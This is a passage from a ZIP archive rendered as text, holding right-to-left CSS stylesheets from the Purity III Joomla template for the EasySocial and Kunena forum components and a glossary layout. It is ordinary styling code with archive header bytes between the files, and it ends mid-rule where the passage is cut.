}PKӜ�\k�O���,purity_iii/css/rtl/extras/com_easysocial.cssnu&1i�.com_easysocial .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
  color: #ffffff;
}
.com_easysocial .stream-meta {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .stream-meta .stream-content .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .es-stream-meta .es-stream-title .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
.com_easysocial .dropdown-menu > li {
  border: 0;
}
.com_easysocial #es .app-news .checkbox input[type="checkbox"] {
  position: relative;
  margin-right: 0;
}
#es .o-nav--block {
  white-space: normal;
}
.es {
  clear: both;
}PKӜ�\���J�o�o(purity_iii/css/rtl/extras/com_kunena.cssnu&1i�#kunena.layout .btn-group .dropdown-menu {
  background: #ffffff;
  border-color: #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li {
  border-top: 1px solid #d5d5d5;
}
#kunena.layout .btn-group .dropdown-menu li a {
  color: #444444;
}
#kunena.layout .btn-group .dropdown-menu li a:hover {
  background-color: #eeeeee;
}
#kunena.layout .btn-group .dropdown-menu li:empty {
  display: none;
}
#kunena.layout input[type="checkbox"] {
  height: auto;
}
#kunena.layout .navbar {
  background: transparent;
  border: 0;
  border-bottom: 3px solid #0077bb;
  border-radius: 0;
  min-height: 0;
}
#kunena.layout .navbar .nav {
  margin-bottom: 0;
  width: auto;
}
#kunena.layout .navbar .nav > li {
  margin-left: 3px;
  margin-right: 0;
}
#kunena.layout .navbar .nav > li > a {
  background-color: #444444;
  border-radius: 2px 2px 0 0;
  color: #ffffff;
  font-weight: 400;
  line-height: 1.42857143;
  padding: 5px 10px;
  text-transform: none;
}
#kunena.layout .navbar .nav > li > a:hover,
#kunena.layout .navbar .nav > li > a:focus,
#kunena.layout .navbar .nav > li > a:active {
  background-color: #222222;
  box-shadow: none;
}
#kunena.layout .navbar .nav > li.active a {
  background-color: #0077bb;
  box-shadow: none;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .navbar-nav.pull-left > div {
    padding-top: 10px;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .btn {
    background: #0077bb;
    color: #ffffff;
    text-align: center;
    text-decoration: none;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse {
    background: #ffffff;
    display: none;
    padding: 0;
    position: absolute;
    width: 100%;
    z-index: 10;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse.in {
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav {
    border: 1px solid #eeeeee;
    display: block;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li {
    background: #ffffff;
    border: 0;
    margin-left: 0;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a {
    background: #ffffff;
    color: #444444;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:hover,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:focus,
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li a:active {
    color: #0077bb;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li.active a {
    color: #0077bb;
  }
  #kunena.layout .navbar .navbar-nav.pull-left .knav-collapse .navbar-nav li + li {
    border-top: 1px solid #eeeeee;
  }
}
#kunena.layout .navbar .mobile-user {
  border-radius: 0;
  color: #444444;
  margin-left: 0;
  margin-top: 0 !important;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle {
  background-color: transparent;
  border-radius: 0;
  color: #444444;
  padding: 5px 10px;
  line-height: 20px;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle:hover,
#kunena.layout .navbar .mobile-user .dropdown-toggle:focus,
#kunena.layout .navbar .mobile-user .dropdown-toggle:active {
  background-color: transparent;
}
#kunena.layout .navbar .mobile-user .dropdown-toggle img {
  box-shadow: none;
  height: 17px;
  width: 17px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  right: auto;
  left: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #0077bb;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-left: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  right: auto;
  left: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #00466e;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #0077bb;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-left: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-left: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-right: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: right;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: right;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #00466e;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-right: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 0 0 12px;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #00466e;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-left: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #00466e;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #00466e;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-left: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: right;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-right: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  right: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #0077bb;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-left: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-right: 0;
    margin-left: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-right: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-right: 20px;
    padding-left: 20px;
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 0 10px 10px;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #0077bb;
  color: #0077bb;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-left: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #0077bb;
  border: 1px solid #0077bb;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: right;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-right: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: right;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-left: 5px;
  margin-bottom: 10px;
  float: right;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: left;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-left: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-left: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-right: 1px solid #eeeeee;
  margin-right: -1px;
  padding-right: 20px;
  padding-left: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: left;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-right: 10px;
  padding-left: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-left: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #0077bb;
  color: #0077bb;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #0077bb;
  border-color: #0077bb;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: right;
}
#kunena.layout ul.pagination li + li {
  border-right: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-right: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\_SNlrr-purity_iii/css/rtl/extras/layout_glossary.cssnu&1i�.glossary-nav {
  position: relative;
  z-index: 10;
  margin-bottom: 40px;
}
.glossary-nav nav {
  padding: 0;
}
.glossary-nav nav.affix {
  top: auto;
  position: relative;
}
.glossary-nav nav .nav-pills {
  background: #fff;
}
.glossary-nav nav .nav-pills > li {
  display: block;
  float: right;
  margin: 0 0 10px 1px;
}
.glossary-nav nav .nav-pills > li > a {
  background: #444444;
  color: #eeeeee;
  font-size: 18px;
  font-weight: 600;
  line-height: normal;
  padding: 0;
  width: 50px;
  height: 50px;
  line-height: 50px;
  text-align: center;
  text-transform: uppercase;
}
.glossary-nav nav .nav-pills > li > a:hover,
.glossary-nav nav .nav-pills > li > a:active,
.glossary-nav nav .nav-pills > li > a:focus {
  background: #0077bb;
  color: #fff;
}
@media screen and (min-width: 991px) {
  .glossary-nav nav.affix {
    top: 57px;
    position: fixed;
  }
  .glossary-nav nav .nav-pills > li > a {
    font-size: 24px;
  }
}
.glossary-group {
  margin-bottom: 40px;
  position: relative;
}
.glossary-group a[name] {
  position: absolute;
  top: -120px;
}
.glossary-group-title {
